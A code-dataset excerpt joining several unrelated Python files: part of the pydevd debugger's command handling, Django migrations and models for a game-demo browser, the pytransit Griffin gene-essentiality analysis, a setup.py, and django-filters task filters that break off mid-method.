def __init__(self, seq, thread_id, frame_id, scope, attrs):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.scope = scope
self.attributes = attrs
def do_it(self, dbg):
""" Converts request into python variable """
try:
xml = "<xml>"
_typeName, valDict = pydevd_vars.resolve_compound_variable(self.thread_id, self.frame_id, self.scope, self.attributes)
if valDict is None:
valDict = {}
keys = valDict.keys()
if _typeName != "OrderedDict" and not IS_PY36_OR_GREATER:
if hasattr(keys, 'sort'):
keys.sort(compare_object_attrs) #Python 3.0 does not have it
else:
if IS_PY3K:
keys = sorted(keys, key=cmp_to_key(compare_object_attrs)) #Jython 2.1 does not have it (and all must be compared as strings).
else:
keys = sorted(keys, cmp=compare_object_attrs) #Jython 2.1 does not have it (and all must be compared as strings).
for k in keys:
xml += pydevd_xml.var_to_xml(valDict[k], to_string(k))
xml += "</xml>"
cmd = dbg.cmd_factory.make_get_variable_message(self.sequence, xml)
dbg.writer.add_command(cmd)
except Exception:
cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error resolving variables " + get_exception_traceback_str())
dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalGetArray
#=======================================================================================================================
class InternalGetArray(InternalThreadCommand):
def __init__(self, seq, roffset, coffset, rows, cols, format, thread_id, frame_id, scope, attrs):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.scope = scope
self.name = attrs.split("\t")[-1]
self.attrs = attrs
self.roffset = int(roffset)
self.coffset = int(coffset)
self.rows = int(rows)
self.cols = int(cols)
self.format = format
def do_it(self, dbg):
try:
frame = pydevd_vars.find_frame(self.thread_id, self.frame_id)
var = pydevd_vars.eval_in_context(self.name, frame.f_globals, frame.f_locals)
xml = pydevd_vars.table_like_struct_to_xml(var, self.name, self.roffset, self.coffset, self.rows, self.cols, self.format )
cmd = dbg.cmd_factory.make_get_array_message(self.sequence, xml)
dbg.writer.add_command(cmd)
except:
cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error resolving array: " + get_exception_traceback_str())
dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalChangeVariable
#=======================================================================================================================
class InternalChangeVariable(InternalThreadCommand):
""" changes the value of a variable """
def __init__(self, seq, thread_id, frame_id, scope, attr, expression):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.scope = scope
self.attr = attr
self.expression = expression
def do_it(self, dbg):
""" Converts request into python variable """
try:
result = pydevd_vars.change_attr_expression(self.thread_id, self.frame_id, self.attr, self.expression, dbg)
xml = "<xml>"
xml += pydevd_xml.var_to_xml(result, "")
xml += "</xml>"
cmd = dbg.cmd_factory.make_variable_changed_message(self.sequence, xml)
dbg.writer.add_command(cmd)
except Exception:
cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error changing variable attr:%s expression:%s traceback:%s" % (self.attr, self.expression, get_exception_traceback_str()))
dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalGetFrame
#=======================================================================================================================
class InternalGetFrame(InternalThreadCommand):
""" gets the value of a variable """
def __init__(self, seq, thread_id, frame_id):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
def do_it(self, dbg):
""" Converts request into python variable """
try:
frame = pydevd_vars.find_frame(self.thread_id, self.frame_id)
if frame is not None:
hidden_ns = pydevconsole.get_ipython_hidden_vars()
xml = "<xml>"
xml += pydevd_xml.frame_vars_to_xml(frame.f_locals, hidden_ns)
del frame
xml += "</xml>"
cmd = dbg.cmd_factory.make_get_frame_message(self.sequence, xml)
dbg.writer.add_command(cmd)
else:
#pydevd_vars.dump_frames(self.thread_id)
#don't print this error: frame not found: means that the client is not synchronized (but that's ok)
cmd = dbg.cmd_factory.make_error_message(self.sequence, "Frame not found: %s from thread: %s" % (self.frame_id, self.thread_id))
dbg.writer.add_command(cmd)
except:
cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error resolving frame: %s from thread: %s" % (self.frame_id, self.thread_id))
dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalEvaluateExpression
#=======================================================================================================================
class InternalEvaluateExpression(InternalThreadCommand):
""" gets the value of a variable """
def __init__(self, seq, thread_id, frame_id, expression, doExec, doTrim, temp_name):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.expression = expression
self.doExec = doExec
self.doTrim = doTrim
self.temp_name = temp_name
def do_it(self, dbg):
""" Converts request into python variable """
try:
result = pydevd_vars.evaluate_expression(self.thread_id, self.frame_id, self.expression, self.doExec)
if self.temp_name != "":
pydevd_vars.change_attr_expression(self.thread_id, self.frame_id, self.temp_name, self.expression, dbg, result)
xml = "<xml>"
xml += pydevd_xml.var_to_xml(result, self.expression, self.doTrim)
xml += "</xml>"
cmd = dbg.cmd_factory.make_evaluate_expression_message(self.sequence, xml)
dbg.writer.add_command(cmd)
except:
exc = get_exception_traceback_str()
sys.stderr.write('%s\n' % (exc,))
cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error evaluating expression " + exc)
dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalGetCompletions
#=======================================================================================================================
class InternalGetCompletions(InternalThreadCommand):
""" Gets the completions in a given scope """
def __init__(self, seq, thread_id, frame_id, act_tok):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.act_tok = act_tok
def do_it(self, dbg):
""" Converts request into completions """
try:
remove_path = None
try:
frame = pydevd_vars.find_frame(self.thread_id, self.frame_id)
if frame is not None:
msg = _pydev_completer.generate_completions_as_xml(frame, self.act_tok)
cmd = dbg.cmd_factory.make_get_completions_message(self.sequence, msg)
dbg.writer.add_command(cmd)
else:
cmd = dbg.cmd_factory.make_error_message(self.sequence, "InternalGetCompletions: Frame not found: %s from thread: %s" % (self.frame_id, self.thread_id))
dbg.writer.add_command(cmd)
finally:
if remove_path is not None:
sys.path.remove(remove_path)
except:
exc = get_exception_traceback_str()
sys.stderr.write('%s\n' % (exc,))
cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error evaluating expression " + exc)
dbg.writer.add_command(cmd)
# =======================================================================================================================
# InternalGetDescription
# =======================================================================================================================
class InternalGetDescription(InternalThreadCommand):
""" Fetch the variable description stub from the debug console
"""
def __init__(self, seq, thread_id, frame_id, expression):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.expression = expression
def do_it(self, dbg):
""" Get completions and write back to the client
"""
try:
frame = pydevd_vars.find_frame(self.thread_id, self.frame_id)
description = pydevd_console.get_description(frame, self.thread_id, self.frame_id, self.expression)
description = pydevd_xml.make_valid_xml_value(quote(description, '/>_= \t'))
description_xml = '<xml><var name="" type="" value="%s"/></xml>' % description
cmd = dbg.cmd_factory.make_get_description_message(self.sequence, description_xml)
dbg.writer.add_command(cmd)
except:
exc = get_exception_traceback_str()
cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error in fetching description" + exc)
dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalGetBreakpointException
#=======================================================================================================================
class InternalGetBreakpointException(InternalThreadCommand):
""" Send details of exception raised while evaluating conditional breakpoint """
def __init__(self, thread_id, exc_type, stacktrace):
self.sequence = 0
self.thread_id = thread_id
self.stacktrace = stacktrace
self.exc_type = exc_type
def do_it(self, dbg):
try:
callstack = "<xml>"
makeValid = pydevd_xml.make_valid_xml_value
for filename, line, methodname, methodobj in self.stacktrace:
if file_system_encoding.lower() != "utf-8" and hasattr(filename, "decode"):
# filename is a byte string encoded using the file system encoding
# convert it to utf8
filename = filename.decode(file_system_encoding).encode("utf-8")
callstack += '<frame thread_id = "%s" file="%s" line="%s" name="%s" obj="%s" />' \
% (self.thread_id, makeValid(filename), line, makeValid(methodname), makeValid(methodobj))
callstack += "</xml>"
cmd = dbg.cmd_factory.make_send_breakpoint_exception_message(self.sequence, self.exc_type + "\t" + callstack)
dbg.writer.add_command(cmd)
except:
exc = get_exception_traceback_str()
sys.stderr.write('%s\n' % (exc,))
cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error Sending Exception: " + exc)
dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalSendCurrExceptionTrace
#=======================================================================================================================
class InternalSendCurrExceptionTrace(InternalThreadCommand):
""" Send details of the exception that was caught and where we've broken in.
"""
def __init__(self, thread_id, arg, curr_frame_id):
'''
:param arg: exception type, description, traceback object
'''
self.sequence = 0
self.thread_id = thread_id
self.curr_frame_id = curr_frame_id
self.arg = arg
def do_it(self, dbg):
try:
cmd = dbg.cmd_factory.make_send_curr_exception_trace_message(self.sequence, self.thread_id, self.curr_frame_id, *self.arg)
del self.arg
dbg.writer.add_command(cmd)
except:
exc = get_exception_traceback_str()
sys.stderr.write('%s\n' % (exc,))
cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error Sending Current Exception Trace: " + exc)
dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalSendCurrExceptionTraceProceeded
#=======================================================================================================================
class InternalSendCurrExceptionTraceProceeded(InternalThreadCommand):
""" Send details of the exception that was caught and where we've broken in.
"""
def __init__(self, thread_id):
self.sequence = 0
self.thread_id = thread_id
def do_it(self, dbg):
try:
cmd = dbg.cmd_factory.make_send_curr_exception_trace_proceeded_message(self.sequence, self.thread_id)
dbg.writer.add_command(cmd)
except:
exc = get_exception_traceback_str()
sys.stderr.write('%s\n' % (exc,))
cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error Sending Current Exception Trace Proceeded: " + exc)
dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalEvaluateConsoleExpression
#=======================================================================================================================
class InternalEvaluateConsoleExpression(InternalThreadCommand):
""" Execute the given command in the debug console """
def __init__(self, seq, thread_id, frame_id, line, buffer_output=True):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.line = line
self.buffer_output = buffer_output
def do_it(self, dbg):
""" Create an XML for console output, error and more (true/false)
<xml>
<output message=output_message></output>
<error message=error_message></error>
<more>true/false</more>
</xml>
"""
try:
frame = pydevd_vars.find_frame(self.thread_id, self.frame_id)
if frame is not None:
console_message = pydevd_console.execute_console_command(
frame, self.thread_id, self.frame_id, self.line, self.buffer_output)
cmd = dbg.cmd_factory.make_send_console_message(self.sequence, console_message.to_xml())
else:
from _pydevd_bundle.pydevd_console import ConsoleMessage
console_message = ConsoleMessage()
console_message.add_console_message(
pydevd_console.CONSOLE_ERROR,
"Select the valid frame in the debug view (thread: %s, frame: %s invalid)" % (self.thread_id, self.frame_id),
)
cmd = dbg.cmd_factory.make_error_message(self.sequence, console_message.to_xml())
except:
exc = get_exception_traceback_str()
cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error evaluating expression " + exc)
dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalRunCustomOperation
#=======================================================================================================================
class InternalRunCustomOperation(InternalThreadCommand):
""" Run a custom command on an expression
"""
def __init__(self, seq, thread_id, frame_id, scope, attrs, style, encoded_code_or_file, fnname):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.scope = scope
self.attrs = attrs
self.style = style
self.code_or_file = unquote_plus(encoded_code_or_file)
self.fnname = fnname
def do_it(self, dbg):
try:
res = pydevd_vars.custom_operation(self.thread_id, self.frame_id, self.scope, self.attrs,
self.style, self.code_or_file, self.fnname)
resEncoded = quote_plus(res)
cmd = dbg.cmd_factory.make_custom_operation_message(self.sequence, resEncoded)
dbg.writer.add_command(cmd)
except:
exc = get_exception_traceback_str()
cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error in running custom operation" + exc)
dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalConsoleGetCompletions
#=======================================================================================================================
class InternalConsoleGetCompletions(InternalThreadCommand):
""" Fetch the completions in the debug console
"""
def __init__(self, seq, thread_id, frame_id, act_tok):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.act_tok = act_tok
def do_it(self, dbg):
""" Get completions and write back to the client
"""
try:
frame = pydevd_vars.find_frame(self.thread_id, self.frame_id)
completions_xml = pydevd_console.get_completions(frame, self.act_tok)
cmd = dbg.cmd_factory.make_send_console_message(self.sequence, completions_xml)
dbg.writer.add_command(cmd)
except:
exc = get_exception_traceback_str()
cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error in fetching completions" + exc)
dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalConsoleExec
#=======================================================================================================================
class InternalConsoleExec(InternalThreadCommand):
""" gets the value of a variable """
def __init__(self, seq, thread_id, frame_id, expression):
self.sequence = seq
self.thread_id = thread_id
self.frame_id = frame_id
self.expression = expression
def do_it(self, dbg):
""" Converts request into python variable """
try:
try:
#don't trace new threads created by console command
disable_trace_thread_modules()
result = pydevconsole.console_exec(self.thread_id, self.frame_id, self.expression, dbg)
xml = "<xml>"
xml += pydevd_xml.var_to_xml(result, "")
xml += "</xml>"
cmd = dbg.cmd_factory.make_evaluate_expression_message(self.sequence, xml)
dbg.writer.add_command(cmd)
except:
exc = get_exception_traceback_str()
sys.stderr.write('%s\n' % (exc,))
cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error evaluating console expression " + exc)
dbg.writer.add_command(cmd)
finally:
enable_trace_thread_modules()
sys.stderr.flush()
sys.stdout.flush()
#=======================================================================================================================
# pydevd_find_thread_by_id
#=======================================================================================================================
def pydevd_find_thread_by_id(thread_id):
try:
# there was a deadlock here when I did not remove the tracing function when thread was dead
threads = threading.enumerate()
for i in threads:
tid = get_thread_id(i)
if thread_id == tid or thread_id.endswith('|' + tid):
return i
sys.stderr.write("Could not find thread %s\n" % thread_id)
sys.stderr.write("Available: %s\n" % [get_thread_id(t) for t in threads])
sys.stderr.flush()
except:
traceback.print_exc()
return None
| suncycheng/intellij-community | python/helpers/pydev/_pydevd_bundle/pydevd_comm.py | Python | apache-2.0 | 60,914 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('hiscores', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='skills',
name='creation_time',
field=models.DateTimeField(default=django.utils.timezone.now),
),
]
| RaghavPro/Runescape-Hiscores | hiscores/migrations/0002_skills_creation_time.py | Python | gpl-2.0 | 450 |
#
# AtHomePowerlineServer - networked server for CM11/CM11A/XTB-232 X10 controllers
# Copyright (C) 2014 Dave Hocker
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# See the LICENSE file for more details.
#
# Database | dhocker/athomepowerlineserver | database/__init__.py | Python | gpl-3.0 | 387 |
import sys
try:
import wx
WX_VERSION = int(wx.version()[0])
hasWx = True
except Exception as e:
hasWx = False
WX_VERSION = 0
if hasWx:
import wx.xrc
from wx.lib.buttons import GenBitmapTextButton
from pubsub import pub
import wx.adv
import os
import time
import math
import random
import numpy
import scipy.stats
import datetime
from pytransit.analysis import base
import pytransit.transit_tools as transit_tools
import pytransit.tnseq_tools as tnseq_tools
import pytransit.norm_tools as norm_tools
import pytransit.stat_tools as stat_tools
#method_name = "griffin"
############# GUI ELEMENTS ##################
short_name = "griffin"
long_name = "Griffin"
short_desc = "Basic frequentist analysis of essentiality using gaps."
long_desc = "Analysis of gaps used in Griffin et al. 2011"
transposons = ["himar1"]
columns = ["Orf","Name","Desc","k","n","r","s","t","Expected Run","p-value", "p-adjusted"]
############# Analysis Method ##############
class GriffinAnalysis(base.TransitAnalysis):
def __init__(self):
base.TransitAnalysis.__init__(self, short_name, long_name, short_desc, long_desc, transposons, GriffinMethod, GriffinGUI, [GriffinFile])
################## FILE ###################
class GriffinFile(base.TransitFile):
def __init__(self):
base.TransitFile.__init__(self, "#Griffin", columns)
def getHeader(self, path):
ess=0; unc=0; non=0; short=0
for line in open(path):
if line.startswith("#"): continue
tmp = line.strip().split("\t")
if float(tmp[-1]) < 0.05:
ess+=1
else:
non+=1
text = """Results:
Essentials: %s
Non-Essential: %s
""" % (ess,non)
return text
################## GUI ###################
class GriffinGUI(base.AnalysisGUI):
def definePanel(self, wxobj):
self.wxobj = wxobj
griffinPanel = wx.Panel( self.wxobj.optionsWindow, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
griffinSection = wx.BoxSizer( wx.VERTICAL )
griffinLabel = wx.StaticText( griffinPanel, wx.ID_ANY, u"griffin Options", wx.DefaultPosition, (120,-1), 0 )
griffinLabel.SetFont( wx.Font( 10, wx.DEFAULT, wx.NORMAL, wx.BOLD) )
griffinSection.Add( griffinLabel, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL, 5 )
griffinSizer1 = wx.BoxSizer( wx.HORIZONTAL )
griffinSection.Add( griffinSizer1, 1, wx.EXPAND, 5 )
griffinButton = wx.Button( griffinPanel, wx.ID_ANY, u"Run griffin", wx.DefaultPosition, wx.DefaultSize, 0 )
griffinSection.Add( griffinButton, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL, 5 )
griffinPanel.SetSizer( griffinSection )
griffinPanel.Layout()
griffinSection.Fit( griffinPanel )
#Connect events
griffinButton.Bind( wx.EVT_BUTTON, self.wxobj.RunMethod )
self.panel = griffinPanel
########## CLASS #######################
class GriffinMethod(base.SingleConditionMethod):
"""
griffin
"""
def __init__(self,
ctrldata,
annotation_path,
output_file,
minread=1,
replicates="Sum",
normalization=None,
LOESS=False,
ignoreCodon=True,
NTerminus=0.0,
CTerminus=0.0, wxobj=None):
base.SingleConditionMethod.__init__(self, short_name, long_name, short_desc, long_desc, ctrldata, annotation_path, output_file, replicates=replicates, normalization=normalization, LOESS=LOESS, ignoreCodon=ignoreCodon, NTerminus=NTerminus, CTerminus=CTerminus, wxobj=wxobj)
self.minread = minread
@classmethod
def fromGUI(self, wxobj):
""" """
#Get Annotation file
annotationPath = wxobj.annotation
if not transit_tools.validate_annotation(annotationPath):
return None
#Get selected files
ctrldata = wxobj.ctrlSelected()
if not transit_tools.validate_control_datasets(ctrldata):
return None
#Validate transposon types
if not transit_tools.validate_transposons_used(ctrldata, transposons):
return None
#
minread = 1
#Read the parameters from the wxPython widgets
ignoreCodon = True
NTerminus = float(wxobj.globalNTerminusText.GetValue())
CTerminus = float(wxobj.globalCTerminusText.GetValue())
replicates = "Sum"
normalization = None
LOESS = False
#Get output path
name = transit_tools.basename(ctrldata[0])
defaultFileName = "griffin_output.dat"
defaultDir = os.getcwd()
output_path = wxobj.SaveFile(defaultDir, defaultFileName)
if not output_path: return None
output_file = open(output_path, "w")
return self(ctrldata,
annotationPath,
output_file,
minread,
replicates,
normalization,
LOESS,
ignoreCodon,
NTerminus,
CTerminus, wxobj)
@classmethod
def fromargs(self, rawargs):
(args, kwargs) = transit_tools.cleanargs(rawargs)
ctrldata = args[0].split(",")
annotationPath = args[1]
outpath = args[2]
output_file = open(outpath, "w")
minread = int(kwargs.get("m", 1))
replicates = kwargs.get("r", "Sum")
normalization = None
LOESS = False
ignoreCodon = not kwargs.get("sC", False)
NTerminus = float(kwargs.get("iN", 0.0))
CTerminus = float(kwargs.get("iC", 0.0))
return self(ctrldata,
annotationPath,
output_file,
minread,
replicates,
normalization,
LOESS,
ignoreCodon,
NTerminus,
CTerminus)
def Run(self):
self.transit_message("Starting Griffin Method")
start_time = time.time()
#Get orf data
self.transit_message("Getting Data")
(data, position) = transit_tools.get_validated_data(self.ctrldata, wxobj=self.wxobj)
(K,N) = data.shape
if self.normalization and self.normalization != "nonorm":
self.transit_message("Normalizing using: %s" % self.normalization)
(data, factors) = norm_tools.normalize_data(data, self.normalization, self.ctrldata, self.annotation_path)
G = tnseq_tools.Genes(self.ctrldata, self.annotation_path, minread=1, reps=self.replicates, ignoreCodon=self.ignoreCodon, nterm=self.NTerminus, cterm=self.CTerminus, data=data, position=position)
N = len(G)
self.progress_range(N)
count = 0
pins = G.global_theta()
pnon = 1.0 - pins
results = []
for gene in G:
if gene.n == 0:
results.append([gene, 0.0, 1.000])
else:
B = 1.0/math.log(1.0/pnon)
u = math.log(gene.n*pins, 1.0/pnon)
exprun = tnseq_tools.ExpectedRuns(gene.n, pnon)
pval = 1.0 - tnseq_tools.GumbelCDF(gene.r, u, B)
results.append([gene, exprun, pval])
text = "Running Griffin Method... %5.1f%%" % (100.0*(count+1)/(N))
self.progress_update(text, count)
count+=1
pval = [row[-1] for row in results]
padj = stat_tools.BH_fdr_correction(pval)
for i in range(len(results)):
results[i].append(padj[i])
results.sort()
self.output.write("#Griffin\n")
if self.wxobj:
members = sorted([attr for attr in dir(self) if not callable(getattr(self,attr)) and not attr.startswith("__")])
memberstr = ""
for m in members:
memberstr += "%s = %s, " % (m, getattr(self, m))
self.output.write("#GUI with: ctrldata=%s, annotation=%s, output=%s\n" % (",".join(self.ctrldata).encode('utf-8'), self.annotation_path.encode('utf-8'), self.output.name.encode('utf-8')))
else:
self.output.write("#Console: python3 %s\n" % " ".join(sys.argv))
self.output.write("#Data: %s\n" % (",".join(self.ctrldata).encode('utf-8')))
self.output.write("#Annotation path: %s\n" % self.annotation_path.encode('utf-8'))
self.output.write("#Time: %s\n" % (time.time() - start_time))
self.output.write("#%s\n" % "\t".join(columns))
for (gene, exprun, pval, padj) in results:
self.output.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%1.1f\t%1.5f\t%1.5f\n" % (gene.orf, gene.name, gene.desc, gene.k, gene.n, gene.r, gene.s, gene.t, exprun, pval, padj))
self.output.close()
self.transit_message("") # Printing empty line to flush stdout
self.transit_message("Adding File: %s" % (self.output.name))
self.add_file(filetype="Griffin")
self.finish()
self.transit_message("Finished Griffin Method")
@classmethod
def usage_string(self):
return """python3 %s griffin <comma-separated .wig files> <annotation .prot_table> <output file> [Optional Arguments]
Optional Arguments:
-m <integer> := Smallest read-count to consider. Default: -m 1
-r <string> := How to handle replicates. Sum or Mean. Default: -r Sum
-sC := Include stop-codon (default is to ignore).
-iN <float> := Ignore TAs occuring at given fraction (as integer) of the N terminus. Default: -iN 0
-iC <float> := Ignore TAs occuring at given fraction (as integer) of the C terminus. Default: -iC 0
""" % (sys.argv[0])
if __name__ == "__main__":
(args, kwargs) = transit_tools.cleanargs(sys.argv)
G = GriffinMethod.fromargs(sys.argv[1:])
G.console_message("Printing the member variables:")
G.print_members()
print("")
print("Running:")
G.Run()
| mad-lab/transit | src/pytransit/analysis/griffin.py | Python | gpl-3.0 | 10,076 |
from demobrowser import db
from datetime import datetime
import re
from sqlalchemy import or_, and_
import math
class Demo(db.Model):
id = db.Column(db.Integer, primary_key=True)
logfile = db.Column(db.String(10))
size = db.Column(db.String(12))
path = db.Column(db.String(512))
name = db.Column(db.String(80))
sub = db.Column(db.String(160))
date = db.Column(db.Date())
private = db.Column(db.Boolean())
nuked = db.Column(db.Boolean())
summary = db.Column(db.Text())
title = db.Column(db.String(80))
@staticmethod
def get_all():
return Demo.query.all()
@staticmethod
def get_page(page, per_page=12):
return Demo.query.order_by(Demo.date.desc(), Demo.id.desc()).paginate(page, per_page=per_page)
def get_page_of(self, per_page=12):
# Get the number of items NEWER than this one
sweet_query = Demo.query.order_by(Demo.date.asc(),
Demo.id.asc()).filter(or_(Demo.date > self.date,
and_(Demo.date >= self.date,
Demo.id > self.id)))
# Now, calculate the page that this guy is on!
return int(math.ceil((sweet_query.count() + 1) / float(per_page)))
def good_date(self):
# Maybe I like "%B %d, %Y" better...
return self.date.strftime("%d %B %Y")
def previous_by_date(self):
sweet_query = Demo.query.order_by(Demo.date.desc(),
Demo.id.desc()).filter(or_(Demo.date < self.date,
and_(Demo.date <= self.date,
Demo.id < self.id)))
return sweet_query.first()
def next_by_date(self):
sweet_query = Demo.query.order_by(Demo.date.asc(),
Demo.id.asc()).filter(or_(Demo.date > self.date,
and_(Demo.date >= self.date,
Demo.id > self.id)))
return sweet_query.first()
@staticmethod
def demo_exists(demo_name):
return (Demo.query.filter_by(path=demo_name).first() is not None)
@staticmethod
def check_demo_filename(demo_name):
match = re.match('auto-(?P<date>[0-9]{8})-.*-(?P<map>.*)\.dem', demo_name)
result = False
if match:
match_dict = match.groupdict()
str_date = match_dict['date']
match_dict['date'] = datetime(int(str_date[0:4]), int(str_date[4:6]), int(str_date[6:8]))
result = match_dict
return result
@staticmethod
def create_from_name(demo_name):
demo = Demo.check_demo_filename(demo_name)
if demo:
return Demo.create(demo['map'], demo_name, "27.45 MB", demo['date'])
return (False, "Whoops, something went wrong... :( %s" % demo_name)
@staticmethod
def create(map_name, demopath, demo_size, map_date, tflog=None):
# Make sure the user isn't already registered.
demo = Demo.query.filter_by(path=demopath).first()
if demo:
return (False, "Error, demo already exists!")
new_demo = Demo()
new_demo.size = demo_size
new_demo.path = demopath
new_demo.name = map_name
new_demo.date = map_date
# Init the title to the map_name
new_demo.title = map_name
db.session.add(new_demo)
return (True, "Success! Demo '%s' was uploaded!" % demopath)
@staticmethod
def get_from_id(id):
return Demo.query.filter_by(id=id).first()
@staticmethod
def get_from_filename(name):
return Demo.query.filter_by(path=name).first()
@staticmethod
def delete(id):
demo = Demo.query.filter_by(id=id).first()
if not demo:
return False
db.session.delete(demo)
db.session.commit()
return True
def get_map_name(self):
pieces = self.name.upper().split("_")
if len(pieces) > 1:
prefix = pieces.pop(0)
else:
prefix = ""
map_name = " ".join([str(piece).capitalize() for piece in pieces])
return map_name, prefix
def __repr__(self):
return "<(Demo:%s - Title: %s, Date: %s, Map: %s)>" % (self.id, self.title, self.date, self.name)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
steam_id = db.Column(db.String(40))
# this is so we know whos steam id is whos
name = db.Column(db.String(40))
nickname = db.String(80)
admin = db.Column(db.Boolean)
def __repr__(self):
return "<User name='%s' nick='%s' admin='%s' steam='%s'>" % (self.name, self.nickname, self.admin, self.steam_id)
def make_admin(self, admin):
self.admin = admin
db.session.commit()
@staticmethod
def get(steam_id):
# Always create the first user that logs in.
if not User.query.count():
user = User()
user.steam_id = steam_id
user.name = 'FernFerret'
user.admin = True
db.session.add(user)
print "Creating initial user - %s" % steam_id
return user
user = User.query.filter_by(steam_id=steam_id).first()
if not user:
return False
return user
@staticmethod
def get_from_id(id):
return User.query.filter_by(id=id).first()
@staticmethod
def get_all():
return User.query.all()
@staticmethod
def get_test_user():
return User.query.first()
@staticmethod
def create(name, steamid, admin):
# Make sure the user isn't already registered.
user = User.query.filter_by(steam_id=steamid).first()
if user:
return (False, "Error, user already exists!")
new_user = User()
new_user.steam_id = steamid
new_user.name = name
new_user.admin = admin
db.session.add(new_user)
return (True, "Success! User '%s' was created!" % name)
@staticmethod
def delete(id):
user = User.query.filter_by(id=id).first()
if not user:
return False
db.session.delete(user)
db.session.commit()
return True
| FernFerret/demobrowser | demobrowser/models.py | Python | mit | 6,463 |
#!/usr/bin/python
import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
setup(
name='django-sizefield',
version='0.10.ceda',
author='Mathieu Leplatre',
author_email='contact@mathieu-leplatre.info',
url='https://github.com/leplatrem/django-sizefield',
download_url="http://pypi.python.org/pypi/django-sizefield/",
description="A model field to store a file size, whose edition and display shows units.",
long_description=open(os.path.join(here, 'README.rst')).read() + '\n\n' +
open(os.path.join(here, 'CHANGES')).read(),
license='LPGL, see LICENSE file.',
install_requires=[
'Django',
],
packages=find_packages(),
include_package_data=True,
zip_safe=False,
classifiers=['Topic :: Utilities',
'Natural Language :: English',
'Operating System :: OS Independent',
'Intended Audience :: Developers',
'Environment :: Web Environment',
'Framework :: Django',
'Development Status :: 5 - Production/Stable',
'Programming Language :: Python :: 2.7'],
)
| cedadev/django-sizefield | setup.py | Python | lgpl-3.0 | 1,205 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-05-15 16:42
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sonetworks', '0033_auto_20170514_2158'),
]
operations = [
migrations.AlterField(
model_name='socialaccount',
name='email',
field=models.CharField(max_length=256),
),
]
| semitki/semitki | api/sonetworks/migrations/0034_auto_20170515_1642.py | Python | mit | 461 |
version = (0, 0, 1)
version_str = ".".join(str(x) for x in version)
| veltzer/demos-python | config/version.py | Python | gpl-3.0 | 68 |
from django import forms
import django_filters as filters
from tasks.models import Task
from projects.models import Project
from django.contrib.auth.models import User
from milestones.models import Milestone
from django.contrib.contenttypes.models import ContentType
from django.utils.safestring import SafeString
class TaskFilter(filters.FilterSet):
state = filters.MultipleChoiceFilter(
choices = Task.STATE_CHOICES,
widget = forms.CheckboxSelectMultiple,
)
class Meta:
model = Task
fields = ["state"]
class TaskMilestoneFilter(filters.FilterSet):
state = filters.MultipleChoiceFilter(
choices = Task.STATE_CHOICES,
widget = forms.CheckboxSelectMultiple,
)
def __init__(self, project, data=None, queryset=None, prefix=None):
super(TaskMilestoneFilter, self).__init__(data, queryset, prefix)
content_type = ContentType.objects.get_for_model(Project)
self.filters['milestone'] = filters.MultipleChoiceFilter('milestone',
choices = tuple([(m.id, m.title) for m in
Milestone.objects.filter(content_type=content_type,
object_id=project.id)]),
#widget = forms.CheckboxSelectMultiple,
widget = forms.SelectMultiple,
)
class Meta:
model = Task
fields = ["state", "milestone"]
class TaskProjectFilter(filters.FilterSet):
state = filters.MultipleChoiceFilter(
choices = Task.STATE_CHOICES,
widget = forms.CheckboxSelectMultiple,
)
milestones = []
projects = Project.objects.all()
for project in projects:
project_milestones = Milestone.objects.filter(object_id=project.id)
if len(project_milestones) >0:
milestones.append(('', project.name))
for milestone in project_milestones:
milestones.append((milestone.id, SafeString(' ' +
milestone.title)))
milestone = filters.MultipleChoiceFilter(
name = 'milestone',
choices = tuple(milestones),
widget = forms.SelectMultiple,
)
def __init__(self, user, data=None, queryset=None, prefix=None):
super(TaskProjectFilter, self).__init__(data, queryset, prefix)
projects = []
assignee = []
if user.is_authenticated():
assignee.append((user.id, 'Assigned to You'))
